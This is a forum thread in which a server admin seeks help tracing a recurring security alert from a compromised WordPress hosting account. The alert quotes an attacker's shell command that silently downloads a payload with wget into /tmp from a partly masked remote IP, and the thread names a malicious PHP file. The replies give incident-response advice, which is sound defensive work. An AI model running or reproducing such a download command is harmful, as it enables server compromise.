suspicious process from client website

[Hays Sleiman]

Hi guys,

I have WHM and CSF installed and after configuring all settings and so on, there is only one notice I keep getting from CSF that's suspicious however I can't seem to find the culprit file and need some help please.

Time:         Wed Oct 26 02:00:21 2016 +1100
Account:      c150102a
Resource:     Process Time
Exceeded:     3026245 > 1800 (seconds)
Executable:   /usr/bin/bash
Command Line: [B]sh -c cd /tmp ; /usr/bin/wget -t0 -c [URL]http://176.119.x.xx:82/338/d/sess_3306573f35a450867b3c55f039474766[/URL] 1> /dev/null 2> /dev/null && echo OK[/B]
PID:          2261 (Parent PID:2260)
Killed:       No

I am particularly worried about the calls to that IP ^ (176.119.x.xx). I tried getting some info on it, and can only find that it's based in the Ukraine and some suspicious reports on it but nothing definitive.

Another thing I'm finding in CSF logs are from the same client account:

Executable: /usr/bin/php
Command Line: /usr/bin/php /home/c150102a/public_html/wp-content/themes/main-theme/syslib.php

I opened the syslib.php file and it was indeed a bad file. I got rid of it but I'm still getting the log in csf. Does this mean something is still trying to run this file?

I have updated all wordpress files on this specific account (c150102a) and removed all but 3 plugins which I know aren't the cause. I've run some scanners and can't find any bad scripts or any files containing the above commands.

So my question is, what is my next step apart from removing the account all together? I'm not sure how to find what is making calling that command? Is there any way I can find the culprit?

 

[SysSachin]

Executable: /usr/bin/bash Command Line: sh -c cd /tmp ; /usr/bin/wget -t0 -c http://176.119.x.xx:82/338/d/sess_3306573f35a450867b3c55f039474766 1> /dev/null 2> /dev/null && echo OK

As per the above alert , Your user c150102a was running command through SSH. You can remove that account from your server also please check /tmp directory and remove all unwanted file.
If you are not sure about that then please contact to your system admin.

 

[Hays Sleiman]

As per the above alert , Your user c150102a was running command through SSH. You can remove that account from your server also please check /tmp directory and remove all unwanted file.
If you are not sure about that then please contact to your system admin.

I am the system admin. I run the WHM server myself to host client websites.

I'm sorry but I do not believe removing the c150102a account is a solution. The account hosts a website for a customer of mine and I cannot simply remove it.

I would like to learn how to properly diagnose which file is running the command so I can resolve the issue and know how to deal with it in case I run in to something like this again.

 

[Infopro]

I would like to learn

You might want to google that filename, syslib.php for starters.

 

[Hays Sleiman]

Well I found the syslib.php file and removed it. I also did a search for any eval(base64_decode(...)) scripts but didn't find any.

However, I am still receiving the CSF alerts for something calling a command to that Ukraine IP.

Any other suggestions?

 

[Infopro]

Have you checked the account for existing cron jobs?
Cron Jobs - Documentation - cPanel Documentation

That account shouldn't have access to SSH. It's been compromised and should be removed from the server and a backup from before this came up, restored in it's place. Without more knowledge of the server and your security, it's hard to say if the entire server has been compromised or not.

You really should hire someone for assistance with this if you're unsure of your path forward here. This thread is two days old. Your server's been running a compromised site for at least two days too long.

 

[Hays Sleiman]

I double checked. There are no existing cron jobs for any of the users.

And this site has been live for months, yet there are no performance issues and nothing else suspicious going on. No other accounts are reporting any bad activities or scripts. In fact, CSF does not report anything else at all apart from that one alert over and over.

I have run numerous scanners on the account itself internall and externally and a several WordPress plugin scanners and none of them have picked up on anything at all.

If all else fails and I can't find the culprit, I will remove the account and rebuild the site. However, I am still keen to know what could be causing this...

 

[Hays Sleiman]

Hi guys, so I went through all the accounts I had (47 in total) and found only 3 accounts with Shell access. None of these accounts were the same as the one mentioned above that was giving warnings.

However, after fixing this and removing Shell access for these 3 accounts and restarting the server, the warnings have stopped. Not sure what stopped it or what was causing it still, but everything seems fine now and no more security alerts.

Also a system wide scan was clean, so I believe the server is fine and there are no more threats or compromised sites.

 

[NixTree]

Hi

Are you sure you have mounted /tmp and /dev/shm as noexec and nosuid ? If not please do it asap and remount both partitions.

Surely the account mentioned is upto some sort of hack and you need to interospect the account in a detailed manner. Did you checked and scanned the account in question ? Also look for the recent files modified for that account say last 90 days . and see if you are getting any clue. Also check the POST requests in the access logs and see if you are seeing any suspicious entries